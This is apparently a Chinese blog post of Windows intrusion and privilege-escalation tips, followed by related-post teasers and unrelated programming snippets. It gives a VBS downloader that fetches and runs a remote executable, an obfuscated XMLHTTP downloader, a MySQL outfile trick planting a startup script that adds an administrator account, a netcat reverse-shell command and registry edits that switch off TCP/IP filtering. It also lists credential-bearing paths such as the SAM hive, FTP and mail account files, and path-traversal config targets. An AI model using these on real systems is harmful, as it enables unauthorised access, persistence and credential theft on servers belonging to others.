vbs 下载者:
03 |
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs |
05 |
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs |
07 |
echo sGet.Type = 1 >>c:\windows\cftmon.vbs |
09 |
echo sGet.Open() >>c:\windows\cftmon.vbs |
11 |
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs |
13 |
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs |
15 |
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs |
17 |
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs |
2:
01 |
On Error Resume Next:Dim iRemote,iLocal,s1,s2 |
03 |
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) |
05 |
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream" |
07 |
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send() |
09 |
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() |
11 |
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2 |
14 |
create table a (cmd text): |
1 |
insert into a values ("set wshshell=createobject (""wscript.shell"")"); |
3 |
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); |
5 |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); |
7 |
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; |
Cmd 下目录的操作技巧:
列出d的所有目录:
1 |
for /d %i in (d:\freehost\*) do @echo %i |
把当前路径下文件夹的名字只有1-3个字母的显示出来:
1 |
for /d %i in (???) do @echo %i |
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
1 |
for /r %i in (*.exe) do @echo %i |
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
1 |
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i |
这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
1 |
for /f %i in (c:\1.txt) do echo %i |
delims=后的空格是分隔符,tokens是取第几个位置:
1 |
for /f "tokens=2 delims= " %i in (a.txt) do echo %i |
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
009 |
c:\CMailServer\config.ini |
011 |
c:\CMailServer\CMailServer.exe |
013 |
c:\CMailServer\WebMail\index.asp |
015 |
c:\program files\CMailServer\CMailServer.exe |
017 |
c:\program files\CMailServer\WebMail\index.asp |
019 |
C:\WinWebMail\SysInfo.ini |
021 |
C:\WinWebMail\Web\default.asp |
023 |
C:\WINDOWS\FreeHost32.dll |
025 |
C:\WINDOWS\7i24iislog4.exe |
027 |
C:\WINDOWS\7i24tool.exe |
029 |
c:\hzhost\databases\url.asp |
031 |
c:\hzhost\hzclient.exe |
033 |
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk |
035 |
C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk |
037 |
C:\WINDOWS\web.config |
043 |
c:\WWWROOT\index.html |
045 |
c:\website\index.html |
067 |
c:\WWWROOT\default.html |
069 |
c:\website\default.html |
075 |
c:\wwwsite\default.asp |
077 |
c:\WWWROOT\default.asp |
083 |
c:\WWWROOT\default.php |
085 |
c:\WWWsite\default.php |
087 |
C:\Inetpub\wwwroot\pagerror.gif |
089 |
c:\windows\notepad.exe |
093 |
C:\Program Files\Microsoft Office\OFFICE10\winword.exe |
095 |
C:\Program Files\Microsoft Office\OFFICE11\winword.exe |
097 |
C:\Program Files\Microsoft Office\OFFICE12\winword.exe |
099 |
C:\Program Files\Internet Explorer\IEXPLORE.EXE |
101 |
C:\Program Files\winrar\rar.exe |
103 |
C:\Program Files\360\360Safe\360safe.exe |
105 |
C:\Program Files\360Safe\360safe.exe |
107 |
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log |
113 |
C:\Program Files\Rising\Rav\RsTask.xml |
115 |
C:\Documents and Settings\All Users\Start Menu\desktop.ini |
117 |
C:\Documents and Settings\Administrator\My Documents\Default.rdp |
119 |
C:\Documents and Settings\Administrator\Cookies\index.dat |
121 |
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt |
123 |
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt |
125 |
C:\Documents and Settings\Administrator\My Documents\1.txt |
127 |
C:\Documents and Settings\Administrator\桌面\1.txt |
129 |
C:\Documents and Settings\Administrator\My Documents\a.txt |
131 |
C:\Documents and Settings\Administrator\桌面\a.txt |
133 |
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg |
135 |
E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm |
137 |
C:\Program Files\RhinoSoft.com\Serv-U\Version.txt |
139 |
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini |
141 |
C:\Program Files\Symantec\SYMEVENT.INF |
143 |
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe |
145 |
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf |
147 |
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf |
149 |
C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf |
151 |
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm |
153 |
C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT |
155 |
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll |
157 |
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini |
159 |
C:\MySQL\MySQL Server 5.0\my.ini |
161 |
C:\Program Files\MySQL\MySQL Server 5.0\my.ini |
163 |
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm |
165 |
C:\Program Files\MySQL\MySQL Server 5.0\COPYING |
167 |
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql |
169 |
C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe |
171 |
c:\MySQL\MySQL Server 4.1\bin\mysql.exe |
173 |
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm |
175 |
C:\Program Files\Oracle\oraconfig\Lpk.dll |
177 |
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe |
179 |
C:\WINDOWS\system32\inetsrv\w3wp.exe |
181 |
C:\WINDOWS\system32\inetsrv\inetinfo.exe |
183 |
C:\WINDOWS\system32\inetsrv\MetaBase.xml |
185 |
C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp |
187 |
C:\WINDOWS\system32\config\default.LOG |
189 |
C:\WINDOWS\system32\config\sam |
191 |
C:\WINDOWS\system32\config\system |
193 |
c:\CMailServer\config.ini |
195 |
c:\program files\CMailServer\config.ini |
197 |
c:\tomcat6\tomcat6\bin\version.sh |
199 |
c:\tomcat6\bin\version.sh |
201 |
c:\tomcat\bin\version.sh |
203 |
c:\program files\tomcat6\bin\version.sh |
205 |
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh |
207 |
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log |
209 |
c:\Apache2\Apache2\bin\Apache.exe |
211 |
c:\Apache2\bin\Apache.exe |
213 |
c:\Apache2\php\license.txt |
215 |
C:\Program Files\Apache Group\Apache2\bin\Apache.exe |
217 |
c:\Program Files\QQ2007\qq.exe |
219 |
c:\Program Files\Tencent\, qq\User.db |
221 |
c:\Program Files\Tencent\qq\qq.exe |
223 |
c:\Program Files\Tencent\qq\bin\qq.exe |
225 |
c:\Program Files\Tencent\qq2009\qq.exe |
227 |
c:\Program Files\Tencent\qq2008\qq.exe |
229 |
c:\Program Files\Tencent\qq2010\bin\qq.exe |
231 |
c:\Program Files\Tencent\qq\Users\All Users\Registry.db |
233 |
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll |
235 |
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe |
237 |
c:\Program Files\Tencent\RTXServer\AppConfig.xml |
239 |
C:\Program Files\Foxmal\Foxmail.exe |
241 |
C:\Program Files\Foxmal\accounts.cfg |
243 |
C:\Program Files\tencent\Foxmal\Foxmail.exe |
245 |
C:\Program Files\tencent\Foxmal\accounts.cfg |
247 |
C:\Program Files\LeapFTP 3.0\LeapFTP.exe |
249 |
C:\Program Files\LeapFTP\LeapFTP.exe |
251 |
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe |
253 |
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt |
255 |
C:\Program Files\FlashFXP\FlashFXP.ini |
257 |
C:\Program Files\FlashFXP\flashfxp.exe |
259 |
c:\Program Files\Oracle\bin\regsvr32.exe |
261 |
c:\Program Files\腾讯游戏\QQGAME\readme.txt |
263 |
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt |
265 |
c:\Program Files\tencent\QQGAME\readme.txt |
267 |
C:\Program Files\StormII\Storm.exe |
各种网站的配置文件相对路径大全:
017 |
../../../config.inc.php |
047 |
../../../config.inc.php |
051 |
../../config/config.php |
055 |
../../../config/config.php |
057 |
/config/config.inc.php |
059 |
./config/config.inc.php |
061 |
../../config/config.inc.php |
063 |
../config/config.inc.php |
065 |
../../../config/config.inc.php |
071 |
../../config/conn.php |
075 |
../../../config/conn.php |
081 |
../../config/conn.asp |
085 |
../../../config/conn.asp |
087 |
/config/config.inc.php |
089 |
./config/config.inc.php |
091 |
../../config/config.inc.php |
093 |
../config/config.inc.php |
095 |
../../../config/config.inc.php |
099 |
../../data/config.php |
103 |
../../../data/config.php |
107 |
./data/config.inc.php |
109 |
../../data/config.inc.php |
111 |
../data/config.inc.php |
113 |
../../../data/config.inc.php |
123 |
../../../data/conn.php |
133 |
../../../data/conn.asp |
137 |
./data/config.inc.php |
139 |
../../data/config.inc.php |
141 |
../data/config.inc.php |
143 |
../../../data/config.inc.php |
147 |
../../include/config.php |
149 |
../include/config.php |
151 |
../../../include/config.php |
153 |
/include/config.inc.php |
155 |
./include/config.inc.php |
157 |
../../include/config.inc.php |
159 |
../include/config.inc.php |
161 |
../../../include/config.inc.php |
167 |
../../include/conn.php |
171 |
../../../include/conn.php |
177 |
../../include/conn.asp |
181 |
../../../include/conn.asp |
183 |
/include/config.inc.php |
185 |
./include/config.inc.php |
187 |
../../include/config.inc.php |
189 |
../include/config.inc.php |
191 |
../../../include/config.inc.php |
199 |
../../../inc/config.php |
205 |
../../inc/config.inc.php |
207 |
../inc/config.inc.php |
209 |
../../../inc/config.inc.php |
219 |
../../../inc/conn.php |
229 |
../../../inc/conn.asp |
235 |
../../inc/config.inc.php |
237 |
../inc/config.inc.php |
239 |
../../../inc/config.inc.php |
去除TCP IP筛选:
TCP/IP筛选在注册表里有三处,分别是:
1 |
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip |
3 |
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip |
5 |
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |
分别用以下命令来导出注册表项:
1 |
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |
3 |
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip |
5 |
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |
然后再把三个文件里的:
1 |
“EnableSecurityFilters"=dword:00000001” |
改为:
1 |
“EnableSecurityFilters"=dword:00000000” |
再将以上三个文件分别用以下命令导入注册表即可:
Webshell 提权小技巧:
Cmd路径:
1 |
c:\windows\temp\cmd.exe |
Nc 也在同目录下,例如反弹cmdshell:
1 |
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" |
通常都不会成功。
而直接在 cmd 路径上输入:
命令输入:
1 |
-vv ip 999 -e c:\windows\temp\cmd.exe |
却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
命令行调用 RAR 打包:
1 |
rar a -k -r -s -m3 c:\1.rar c:\folde |
- WINDOWS渗透与提权总结(1)
旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02 03 If (LCase(Right(WScript.Fullname, 11)) = ...
- 小白日记21:kali渗透测试之提权(一)--本地提权
本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...
- 2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践
目录 PART ONE :Windows本地内核提权 漏洞概述 漏洞原理 漏洞复现 windbg调试本地内核 查看SSDT表和SSDTShadow表 查看窗口站结构体信息 利用Poc验证漏洞 漏洞利用 ...
- metasploit下Windows的多种提权方法
metasploit下Windows的多种提权方法 前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以 ...
- LINUX渗透与提权总结
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002 ...
- 小白日记25:kali渗透测试之提权(五)--利用配置不当提权
利用配置不当提权 与漏洞提权相比,更常见的方法.在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵.当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行 ...
- 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz
WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全 ...
- metasploit下Windows下多种提权方式
前言 当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病 ...
- 转载:windows的mysql提权方式
mysql提权语句归纳如下: 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ...
随机推荐
- linux下c++开发环境安装(eclipse+cdt)
方法一: 此外,众所周知,Eclipse是Java程序,因此很容易就实现了跨平台,也是众所周知,Java的大型程序非常吃内存,即使有512MB内存, 仍然感觉Eclipse的启动速度很慢.个人认为1G ...
- JQuery判断数组中是否包含某个元素$.inArray("js", arr);
var arr = [ "xml", "html", "css", "js" ]; $.inArray(" ...
- InfluxDb系列:几个关键概念(主要是和关系数据库做对比)
https://docs.influxdata.com/influxdb/v0.9/concepts/key_concepts/ #,measurement,就相当于关系数据库中的table,他就是 ...
- EventBus框架在Android多Pane(Fragment)中的应用
通常多pane的设计中,比如Fragment A是个Headline,Fragement B是detail,那么B通常需要实现A的点击事件的接口,这样子的话,两个fragment就高耦合了,而且需要在 ...
- 【原创】基于Memcached 实现用户登录的Demo(附源码)
一个简单的Memcached在Net中运用的一个demo.主要技术 Dapper+MVC+Memcached+sqlserver, 开发工具为vs2015+Sql 效果图如下: 登录后 解决方案 主要 ...
- 【POJ各种模板汇总】(写在逆风省选前)(不断更新中)
1.POJ1258 水水的prim……不过poj上硬是没过,wikioi上的原题却过了 #include<cstring> #include<algorithm> #inclu ...
- [USACO2003][poj2185]Milking Grid(kmp的next的应用)
题目:http://poj.org/problem?id=2185 题意:就是要求一个字符矩阵的最小覆盖矩阵,可以在末尾不完全重合(即在末尾只要求最小覆盖矩阵的前缀覆盖剩余的尾部就行了) 分析: 先看 ...
- 实现一个基于WCF的分布式缓存系统
tks:http://www.cnblogs.com/xiguain/p/3913220.html
- WCF 入门 (16)
前言 上周回母校见了一下大学老师,还有些同学,发现差距还是挺大的...圈子不一样,真的就什么都不一样了.. 第16集 WCF中的Soap错误 Soap faults in WCF 首先简单介绍一下什么 ...
- c# 通过反射获取私有方法
class Program { static void Main(string[] args) { //通过反射来调私有的成员 Type type = typeof(Person); //Bindin ...